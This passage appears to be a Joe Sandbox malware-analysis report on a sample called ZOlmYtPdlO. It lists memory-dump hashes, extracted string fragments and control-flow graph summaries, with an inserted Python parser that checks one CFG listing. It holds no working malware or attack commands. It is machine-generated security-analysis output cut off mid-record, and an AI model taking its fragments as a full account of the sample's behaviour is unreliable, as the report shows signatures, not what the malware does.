                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: 3330c689c45aa7897cbb180579b3747aa3eeee490ab5a841e9b73db756940678
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: A311B176504380CFCB16CF14D9C4B16BF71FB94318F24C6AAD8494B656C336D85ACBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: 2626c95c78107abf64b95225c5b6695220254304b8c310642941d797f0a3205d
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 7211BE75504344DFCB02CF20C5C4B25BB62FB84314F24C6AADA498B256C33AE80ACB91
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction ID: d2cfdcd8f217cc85eaa34925b9b3920171c4983938793c1bba417af50da9b747
                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                      • Instruction Fuzzy Hash: 4A11BE75504784CFCB15CF24D5C4B25FB62FB84314F24C6AADA098B656C33AD80ACB61

                                                      Execution Graph

                                                      Execution Coverage:15.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:44
                                                      Total number of Limit Nodes:8

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-2525668591
                                                      • Opcode ID: 96ad47c612a72335bfe7f1d10efa36116abee67095fbb3a4a0b43159ccd5513e
                                                      • Instruction ID: 5ae0f7551e2b9e77537b4eb139b70444358c0cbc377c979c20e30dd7744f7ece
                                                      • Opcode Fuzzy Hash: 96ad47c612a72335bfe7f1d10efa36116abee67095fbb3a4a0b43159ccd5513e
                                                      • Instruction Fuzzy Hash: 37E16FB1A01115DFCB58CF69C884AADBBFAFF8A700F198455E845AB361D730EC41CB51

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 176b14791046dfdc65ca0822661b2a9eb8d43a90efb16576b56334ffffaff9e0
                                                      • Instruction ID: 1ef814a5a00b25bb9ce8309ae73b420ff48353ccaeb9f0798f54d0693e988aab
                                                      • Opcode Fuzzy Hash: 176b14791046dfdc65ca0822661b2a9eb8d43a90efb16576b56334ffffaff9e0
                                                      • Instruction Fuzzy Hash: D8A1D674E05218DFEB14DFA9D884A9DBBF6BF8A300F148069E409EB365DB349941CF51

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: cce1123863b98743668cdbf8b6986060fe9cf88307134c35939d583d822962de
                                                      • Instruction ID: 9d982cc6814d6aaf2a4526a7c95a1b06617ecb68706b9af45a76ac0dfeb1a9f4
                                                      • Opcode Fuzzy Hash: cce1123863b98743668cdbf8b6986060fe9cf88307134c35939d583d822962de
                                                      • Instruction Fuzzy Hash: 5191E674E01218CFDB58DFAAD994A9DBBF2BF89300F14C069E409AB365DB349945CF50

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 50945011aad63ba53f5855a510049fed622a7d7b6369663939743670ba846fae
                                                      • Instruction ID: 277965f7bbeabdadbd3752593dbc08ceae61411a8cf199762d82f2f98204a01f
                                                      • Opcode Fuzzy Hash: 50945011aad63ba53f5855a510049fed622a7d7b6369663939743670ba846fae
                                                      • Instruction Fuzzy Hash: 2E81D574E01218DFEB54DFAAD984A9DBBF6BF89300F14C06AE418AB365DB349941CF50

                                                       Control-flow Graph (rendered graph omitted): function entry block 303ca08-303ca38; calls to 30341a0, 3033cc0 and 3035658.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: eee3698a11eb9e130ca044ca58724acf6f9bfd65e0b128ff59f9e1b4ca4a44cd
                                                      • Instruction ID: 765f106fc0b4333b8ce8841f23d9ad1771976478840f23c2e6f69c6ba4d02192
                                                      • Opcode Fuzzy Hash: eee3698a11eb9e130ca044ca58724acf6f9bfd65e0b128ff59f9e1b4ca4a44cd
                                                      • Instruction Fuzzy Hash: 9D81C374E01218DFEB54DFAAD884A9DBBF6BF89300F14C069E419AB365DB349981CF50

                                                       Control-flow Graph (rendered graph omitted): function entry block 303d278-303d2a8; calls to 30341a0, 3033cc0 and 3035658.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 2ddd4ddf3e6a07507882da2859a80f1e89a8ecb81e8bbcc9e35c15946bf861d6
                                                      • Instruction ID: 98c78cd5a9d3e44cd356bdd65881d616a0452149a8aaa6dc3df68e6edb36b955
                                                      • Opcode Fuzzy Hash: 2ddd4ddf3e6a07507882da2859a80f1e89a8ecb81e8bbcc9e35c15946bf861d6
                                                      • Instruction Fuzzy Hash: 0F81B174E01218CFDB54DFAAD984A9DFBF6BF89300F148069E419AB365DB34A985CF10

                                                       Control-flow Graph (rendered graph omitted): function entry block 303c468-303c498; calls to 30341a0, 3033cc0 and 3035658.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 29a9ccd1c1b2ce372348c0bac145ed502d41e1f838ac92fc2b8a50402361ef7f
                                                      • Instruction ID: 9832a573fcbfe2230667cc382657aa2525ffbd6577d287151854869dcab4dd5a
                                                      • Opcode Fuzzy Hash: 29a9ccd1c1b2ce372348c0bac145ed502d41e1f838ac92fc2b8a50402361ef7f
                                                      • Instruction Fuzzy Hash: 8181D374E01208CFEB54CFAAD984A9DBBF2BF89300F149069E409AB365DB349981CF10

                                                       Control-flow Graph (rendered graph omitted): function entry block 303cfa9-303cfd8; calls to 30341a0, 3033cc0 and 3035658.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: 3430fd7f9c27b143203e47ebdb71baec9312de1ca8035af8eef2d0927260115a
                                                      • Instruction ID: 730fc1e33777f9b85008e67a7958013e6073b9d19a46c4d569ce683eca8a0a55
                                                      • Opcode Fuzzy Hash: 3430fd7f9c27b143203e47ebdb71baec9312de1ca8035af8eef2d0927260115a
                                                      • Instruction Fuzzy Hash: 6B81B374E01218DFDB54DFAAD984A9DBBF6BF89300F14C069E809AB365DB349985CF10

                                                       Control-flow Graph (rendered graph omitted): function entry block 303ccd8-303cd08; calls to 30341a0, 3033cc0 and 3035658.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                      • API String ID: 0-1487592376
                                                      • Opcode ID: f7df85c6c2a930f1d720657aec17c6c4976cda5932b6aacd620d1d538831fb7b
                                                      • Instruction ID: b9cde83791e3891d887e7eb0108b298878dc52b96ba8a2425b96a74a48ad18a4
                                                      • Opcode Fuzzy Hash: f7df85c6c2a930f1d720657aec17c6c4976cda5932b6aacd620d1d538831fb7b
                                                      • Instruction Fuzzy Hash: 8281D274E01218DFEB54DFAAD884A9DBBF6BF89300F14C069E419AB365DB349981CF50

                                                       Control-flow Graph (rendered graph omitted): function entry block 30329ec-30329f6; two call sites to 30302c8.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                      • API String ID: 0-2732225958
                                                      • Opcode ID: 1bfbf12ddeccd88082a0b7fe02d77c400efacb525750d6196be3ec03c2381f09
                                                      • Instruction ID: e04c997cc1a39b07d0bdadd29ae42637757a2c3630dc35d83ce89ad8ca0a2045
                                                      • Opcode Fuzzy Hash: 1bfbf12ddeccd88082a0b7fe02d77c400efacb525750d6196be3ec03c2381f09
                                                      • Instruction Fuzzy Hash: 58026B329056658BCF22CF68CCD279ABBF9FF5B304B0848D5C4559B30AE734A525CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$4'^q
                                                      • API String ID: 0-273632683
                                                      • Opcode ID: 86dc0b689474f3b87c0f0e75cec4159520dd3c7c87ddc05ccd6b7fc578bf0c4a
                                                      • Instruction ID: b668999c0d18470c4605f10b828aef11fbf97508db7760127f0d5eecd8c9c484
                                                      • Opcode Fuzzy Hash: 86dc0b689474f3b87c0f0e75cec4159520dd3c7c87ddc05ccd6b7fc578bf0c4a
                                                      • Instruction Fuzzy Hash: 8582BF31B01609DFCB14CFA8C584AAEBBFAFF89310F158599E4459B361D735E981CB90

                                                       Control-flow Graph (rendered graph omitted): function entry block 30369a0-30369e6; calls to 3037118, to 30369a0 or 3036fc8 (alternative targets at 3036ac1), and to 3039dd0, 303a088 or 303a0e8 (alternative targets at 303708d).
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$Hbq
                                                      • API String ID: 0-662517225
                                                      • Opcode ID: dccb482517a2a1ce8d692cd2641ad26a5f67380d7b6839b66a0190d0a2785ece
                                                      • Instruction ID: c2c0f40a407869b64939f28f429bc2edd7bb19b37f30e2f0ad65d03e3ba374a1
                                                      • Opcode Fuzzy Hash: dccb482517a2a1ce8d692cd2641ad26a5f67380d7b6839b66a0190d0a2785ece
                                                      • Instruction Fuzzy Hash: B6127C71A002199FCB14DF69C894BAEBBFAFF89300F148569E406AB391DF359D45CB90
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4154657727.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_6d80000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c9aa6c50d9cdbc7ca6a03f56628c12a9d01dfcc1787fabd6f6b0c5c12595186
                                                      • Instruction ID: 20f5dc3ea6421401e0d20712d99c0c497b1fd4687789942f3140bd6ca58d19f8
                                                      • Opcode Fuzzy Hash: 3c9aa6c50d9cdbc7ca6a03f56628c12a9d01dfcc1787fabd6f6b0c5c12595186
                                                      • Instruction Fuzzy Hash: 06F10474E01218CFDB54DFA9D894BADBBB2BF88304F10C1A9E848AB355DB749985CF50
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9d57ac25f09397b34c26359ecab7d8147547b83855c7a05c59eff72bf1e6734
                                                      • Instruction ID: 535b66a7b42a051f38782dae137209b8d20c5b9d38027b708d02ffcaa9553e6c
                                                      • Opcode Fuzzy Hash: f9d57ac25f09397b34c26359ecab7d8147547b83855c7a05c59eff72bf1e6734
                                                      • Instruction Fuzzy Hash: DF51D675E01208DFDB18DFAAD484A9DBBB6FF89300F248129E815BB364DB349845CF14
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7c80e6b7a80ccda828c76e96e8c8843de79ea50a720ee02370013a252047464d
                                                      • Instruction ID: 64c83af5a8ab740fcfdde9e4a828cee4a9175c69f913842f712318b588eeb358
                                                      • Opcode Fuzzy Hash: 7c80e6b7a80ccda828c76e96e8c8843de79ea50a720ee02370013a252047464d
                                                      • Instruction Fuzzy Hash: 3151C274E01208DFDB18DFAAD584A9DBBF6FF89300F248529E819AB364DB359945CF10

                                                       Control-flow Graph (rendered graph omitted): function entry block 30376f1-3037725; two calls to 3037538, a call to 30380c9 or 30380d8 (alternative targets at 3037933), and a call to 30363e0.
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                      • API String ID: 0-1932283790
                                                      • Opcode ID: 72c7fb911611296d3d1b793f740705827cfecd52a9fdee34c3b492a443b9bc55
                                                      • Instruction ID: 49865ecffeaa7bdbf5b77bc5c42ed6fe9c781ccf2b0261dd0cad42a8b8c1a698
                                                      • Opcode Fuzzy Hash: 72c7fb911611296d3d1b793f740705827cfecd52a9fdee34c3b492a443b9bc55
                                                      • Instruction Fuzzy Hash: 90127A74A01209CFCB14CF69C984AAEBBF9FF8A710F148599E4199B361DB31ED45CB50

                                                       Control-flow Graph (rendered graph omitted): function entry block 3035f38-3035f5a; calls to 3035f29 or 3035f38 (alternative targets at 3035fba), to 30369a0, to 303aef0, 303aeba or 303afad (alternative targets at 3036011), and to 3036300 or 30362f0 (alternative targets at 3036167).
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hbq$Hbq
                                                      • API String ID: 0-4258043069
                                                      • Opcode ID: c3b71918a99d9a496b1de37e72c3bf3b2c14678050ae2a15e760dbad3dfdc036
                                                      • Instruction ID: fd33dcc4543344cfda3919c96377a6c4a21557e4a87a372174f3c74b214552b7
                                                      • Opcode Fuzzy Hash: c3b71918a99d9a496b1de37e72c3bf3b2c14678050ae2a15e760dbad3dfdc036
                                                      • Instruction Fuzzy Hash: 1291CF313042599FDB15DF28C89476E7BFABF8A300F188869E8468B395CF39C845DB91
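The control_flow_graph line of the record above is a flat token stream: a block is written as `<id> <addr>` or `<id> <start>-<end>`, optionally followed by `call <target>`, and an edge as `<src>-><dst>`. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin; the grammar is inferred from this one listing and may not cover every construct the plugin can emit. It turns the listing into a graph and answers the questions an analyst asks of an unpacked-region function: where does it enter, where does it exit, is every block reachable, which call sites carry more than one recorded target, and does it call itself (the lowest block address is taken as the function entry, which is an assumption).

```python
"""Parse and sanity-check a Joe Sandbox control_flow_graph listing (added example)."""
import re
from collections import defaultdict, deque

# Constructed sample input: the control_flow_graph listing of the record above,
# copied verbatim (the report's two lines joined with a single space).
SAMPLE_CFG = (
    "control_flow_graph "
    "2247 3035f38-3035f5a 2248 3035f70-3035f7b 2247->2248 2249 3035f5c-3035f60 2247->2249 "
    "2252 3036023-303604f 2248->2252 2253 3035f81-3035f83 2248->2253 2250 3035f62-3035f6e 2249->2250 "
    "2251 3035f88-3035f8f 2249->2251 2250->2248 2250->2251 2254 3035f91-3035f98 2251->2254 "
    "2255 3035faf-3035fb8 2251->2255 2259 3036056-3036098 2252->2259 2256 303601b-3036020 2253->2256 "
    "2254->2255 2257 3035f9a-3035fa5 2254->2257 2327 3035fba call 3035f29 2255->2327 "
    "2328 3035fba call 3035f38 2255->2328 2257->2259 2260 3035fab-3035fad 2257->2260 "
    "2279 30360cb-30360cf 2259->2279 2280 303609a-30360ae 2259->2280 2260->2256 2261 3035fc0-3035fc2 "
    "2262 3035fc4-3035fc8 2261->2262 2263 3035fca-3035fd2 2261->2263 2262->2263 "
    "2266 3035fe5-3036004 call 30369a0 2262->2266 2267 3035fe1-3035fe3 2263->2267 "
    "2268 3035fd4-3035fd9 2263->2268 2272 3036006-303600f 2266->2272 2273 3036019 2266->2273 "
    "2267->2256 2268->2267 2329 3036011 call 303aef0 2272->2329 2330 3036011 call 303aeba 2272->2330 "
    "2331 3036011 call 303afad 2272->2331 2273->2256 2276 3036017 2276->2256 2281 3036163-3036165 "
    "2279->2281 2282 30360d1-30360d9 2279->2282 2283 30360b0-30360b6 2280->2283 2284 30360bd-30360c1 "
    "2280->2284 2332 3036167 call 3036300 2281->2332 2333 3036167 call 30362f0 2281->2333 "
    "2285 30360db-30360e7 2282->2285 2286 30360e9-30360f6 2282->2286 2283->2284 2284->2279 "
    "2294 30360f8-3036102 2285->2294 2286->2294 2287 303616d-3036173 2288 3036175-303617b 2287->2288 "
    "2289 303617f-3036186 2287->2289 2292 30361e1-3036240 2288->2292 2293 303617d 2288->2293 "
    "2306 3036247-303625b 2292->2306 2293->2289 2297 3036104-3036113 2294->2297 2298 303612f-3036133 "
    "2294->2298 2309 3036123-303612d 2297->2309 2310 3036115-303611c 2297->2310 2299 3036135-303613b "
    "2298->2299 2300 303613f-3036143 2298->2300 2302 3036189-30361da 2299->2302 2303 303613d 2299->2303 "
    "2300->2289 2304 3036145-3036149 2300->2304 2302->2292 2303->2289 2304->2306 2307 303614f-3036161 "
    "2304->2307 2307->2289 2309->2298 "
    "2310->2309 2327->2261 2328->2261 2329->2276 2330->2276 2331->2276 2332->2287 2333->2287"
)

NODE_ID = re.compile(r"^\d+$")          # block ids are decimal
EDGE = re.compile(r"^(\d+)->(\d+)$")    # edges are "<src>-><dst>"


def parse_cfg(text):
    """Return (nodes, edges, calls) for one control_flow_graph listing.

    Grammar assumed from the listing: after a block id the next token is always
    its address or start-end range (hex), optionally followed by "call <target>".
    Because the address is consumed right after the id, an all-digit address
    such as 3036019 is never mistaken for a block id.
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, calls = {}, [], {}
    i = 0
    while i < len(tokens):
        m = EDGE.match(tokens[i])
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
            continue
        if not NODE_ID.match(tokens[i]) or i + 1 >= len(tokens):
            raise ValueError(f"unexpected token {tokens[i]!r} at position {i}")
        node_id = int(tokens[i])
        start, _, end = tokens[i + 1].partition("-")
        nodes[node_id] = (int(start, 16), int(end or start, 16))
        i += 2
        if i + 1 < len(tokens) and tokens[i] == "call":
            calls[node_id] = int(tokens[i + 1], 16)
            i += 2
    return nodes, edges, calls


def entry_nodes(nodes, edges):
    """Blocks with no predecessor: a well-formed function has exactly one."""
    has_pred = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in has_pred)


def sink_nodes(nodes, edges):
    """Blocks with no successor, i.e. the function's return/exit paths."""
    has_succ = {src for src, _ in edges}
    return sorted(n for n in nodes if n not in has_succ)


def unreachable_from(nodes, edges, entry):
    """Blocks not reachable from `entry` by BFS (dead code or a parse gap)."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, queue = {entry}, deque([entry])
    while queue:
        for dst in succ[queue.popleft()]:
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return sorted(set(nodes) - seen)


def call_sites(nodes, calls):
    """Group recorded call targets by the calling block's start address.

    Several targets under one address mean the sandbox recorded more than one
    resolved callee at that site (the listing shows three at 3036011).
    """
    by_addr = defaultdict(set)
    for node_id, target in calls.items():
        by_addr[nodes[node_id][0]].add(target)
    return {addr: sorted(targets) for addr, targets in by_addr.items()}


def self_calls(nodes, calls):
    """Blocks whose call target is the function's lowest block address (assumed entry)."""
    func_start = min(start for start, _ in nodes.values())
    return sorted(n for n, target in calls.items() if target == func_start)


if __name__ == "__main__":
    nodes, edges, calls = parse_cfg(SAMPLE_CFG)
    print(f"{len(nodes)} blocks, {len(edges)} edges, {len(calls)} call blocks")
    print("entry:", entry_nodes(nodes, edges), "exits:", sink_nodes(nodes, edges))
    print("unreachable:", unreachable_from(nodes, edges, entry_nodes(nodes, edges)[0]))
    for addr, targets in sorted(call_sites(nodes, calls).items()):
        print(f"  call site {addr:x} -> {[hex(t) for t in targets]}")
    print("self-calling blocks:", self_calls(nodes, calls))
```

Run against the record above it finds one entry (block 2247), three exit blocks (2256, 2289, 2306), no unreachable block, three recorded targets for the call at 3036011 and two for the one at 3035fba, and block 2328 calling 3035f38, the address of the first block. The listing on its own does not say why a site has several targets; the grouping only makes that fact visible so it can be compared with the decompiled code.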
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,bq$,bq
                                                      • API String ID: 0-2699258169
                                                      • Opcode ID: ed5b604e9e1a30590b00735aaf9fe4a759750ac5a4af562bd359a1b555a4f4e0
                                                      • Instruction ID: fb17ab42c0c7bdd6d5bfeb8354943007e268c0f3af73f02ecd897ba1b1a7d94e
                                                      • Opcode Fuzzy Hash: ed5b604e9e1a30590b00735aaf9fe4a759750ac5a4af562bd359a1b555a4f4e0
                                                      • Instruction Fuzzy Hash: 6381A234A42509EFCB54CF69C4C496EBBFAFF8A250F148569D405DB365DB32E841CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q
                                                      • API String ID: 0-1946778100
                                                      • Opcode ID: e8c6af2a60437188e13e013162b3e14de8442f35ac047c3697dde8e1903d6a79
                                                      • Instruction ID: 5640efa7bcb985bc06dce1df9d00b0995d28ce3db830b5dea9f09a46c7d0645f
                                                      • Opcode Fuzzy Hash: e8c6af2a60437188e13e013162b3e14de8442f35ac047c3697dde8e1903d6a79
                                                      • Instruction Fuzzy Hash: 5C71BF71B112058FCB04DF6DC884AAEBBFABFC9614B188569E516DB3A1DF319C05CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 4493d156ccbc6a48c7c23b6662ae9b4bca0635738622e4d177e840fcf0aab32a
                                                      • Instruction ID: fa15ae0ee9ed7d7b0ac7be7aff27549ef029b17ac00425ffa87026a67e62c799
                                                      • Opcode Fuzzy Hash: 4493d156ccbc6a48c7c23b6662ae9b4bca0635738622e4d177e840fcf0aab32a
                                                      • Instruction Fuzzy Hash: B8518F357112059FDB04DF69D885BBABBEAEB89310F088466E909CB355DBB1CC41C7A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xbq$Xbq
                                                      • API String ID: 0-1243427068
                                                      • Opcode ID: 9ff3f4d22974a5e751871f4a13c47d270f9ffc1fbc057853763922f0f807c857
                                                      • Instruction ID: c8a47fa0700f72b338b2060da3b05b4b3d2a395caa5b744362af39318600e516
                                                      • Opcode Fuzzy Hash: 9ff3f4d22974a5e751871f4a13c47d270f9ffc1fbc057853763922f0f807c857
                                                      • Instruction Fuzzy Hash: 7631F7397052248BDF5C8A79A5D427EA9EEABC6311F1844B9E807D3384DF75CC448791
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q
                                                      • API String ID: 0-355816377
                                                      • Opcode ID: a0fd842c119cd2bcb5c4dbd768ca28e0dfcccd0ea26688dd9cbcaff132d92542
                                                      • Instruction ID: fa3ab40e39ce6dfe51971ca0a25b39cb3aca97aecff6e7f0cc7731c821d14b80
